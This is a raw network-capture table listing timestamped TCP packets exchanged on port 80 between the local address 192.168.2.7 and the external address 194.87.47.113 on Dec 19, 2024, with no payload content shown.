Dec 19, 2024 08:47:33.301518917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.302067995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.302198887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.302272081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.302862883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.302989006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.303030014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.303656101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.303844929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.303930044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.304539919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.304789066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.304848909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.305318117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.305434942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.305489063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.306031942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.306181908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.306214094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.306823969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.307014942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.307068110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.307621956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.307825089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.307895899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.308450937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.308619976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.308691025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.309350014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.309437990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.309505939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.310081005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.310189962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.310307980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.310858011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.310933113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.310972929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.311563015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.311708927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.311748981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.460565090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.460699081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.460782051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.460969925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.461126089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.461453915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.461493969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.461836100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.462308884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.462466002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.462481022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.463219881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.463294029 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.463469028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.463531971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.463776112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.464183092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.464257002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.464482069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.464828968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.464888096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.465241909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.475770950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.475895882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.475970984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.476346970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.476353884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.476414919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.477114916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.477123976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.477174997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.477927923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.477936029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.477991104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.478678942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.478687048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.478780031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.479418993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.479434013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.479444981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.479495049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.480246067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.480253935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.480264902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.480317116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.481014013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.481023073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.481076002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.481787920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.481796026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.481873035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.482569933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.482578039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.482644081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.483333111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.483340025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.483463049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.484072924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.484090090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.484101057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.484174967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.484916925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.484925032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.485099077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.485649109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.485688925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.485867023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.486449003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.486500978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.486663103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.487234116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.487241983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.487333059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.487957954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.487966061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.488040924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.488750935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.488759041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.488770962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.488830090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.489506960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.489551067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.490005016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.490303993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.490312099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.490377903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.491087914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.491096973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.491199017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.491848946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.491857052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.491925001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.492573977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.492588043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.492599964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.492665052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.493388891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.493415117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.493555069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.494179964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.494201899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.494285107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.494971991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.494980097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.495104074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.495718002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.495724916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.495791912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.496506929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.496515036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.496526957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.496786118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.497255087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.497262955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.497345924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.498075962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.498085022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.498131037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.498845100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.498852968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.498913050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.499588966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.499604940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.499733925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.500406981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.500524998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.501300097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.501316071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.501390934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.502028942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.502038002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.502170086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.502706051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.502728939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.502841949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.503457069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.503482103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.503557920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.504225016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.504240990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.504246950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.504291058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.505079031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.505085945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.505136013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.505770922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.505779028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.505841970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.506614923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.506623030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.506804943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.507375956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.507384062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.507438898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.508142948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.508151054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.508229017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.508830070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.508837938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.508898973 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.652929068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.653057098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.653279066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.653496981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.653786898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.653856993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.654093027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.654445887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.654524088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.654768944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.655378103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.655509949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.655584097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.655898094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.656130075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.656218052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.656650066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.656893969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.656969070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.657392979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.660077095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.660176039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.660255909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.660554886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.660634041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.660878897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.660926104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.661215067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.661623955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.662034035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.662223101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.662465096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.662772894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.662858009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.663001060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.663172007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.663649082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.663923025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.664122105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.664678097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.664958954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.665036917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.665846109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.665950060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.666068077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.666251898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.666593075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.666805029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.666933060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.667229891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.667524099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.667607069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.667763948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.668016911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.668028116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.668555975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.668720007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.668776989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.669369936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.669481039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.669562101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.670156956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.670260906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.670319080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.670948982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.671026945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.671163082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.671734095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.671921968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.671921968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.672532082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.672641039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.672708988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.673329115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.673444033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.673517942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.674173117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.674344063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.674509048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.674881935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.675100088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.675213099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.675693989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.675896883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.675962925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.676472902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.676675081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.676757097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.677311897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.677429914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.677454948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.678167105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.678361893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.678467035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.678936005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.679092884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.679332972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.679733038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.679898977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.680012941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.680577040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.680728912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.680897951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.681381941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.681552887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.681682110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.682228088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.682449102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.682693958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.683051109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.683168888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.683285952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.683649063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.683832884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.684077978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.684400082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.684581041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.684703112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.685220957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.685411930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.685487032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.685981989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.686244011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.686312914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.686836958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.687038898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.687333107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.687557936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.687764883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.688126087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.688344002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.688571930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.688699007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.689142942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.689357996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.689430952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.689929962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.690154076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.690244913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.690772057 CET	80	49707	194.87.47.113	192.168.2.7
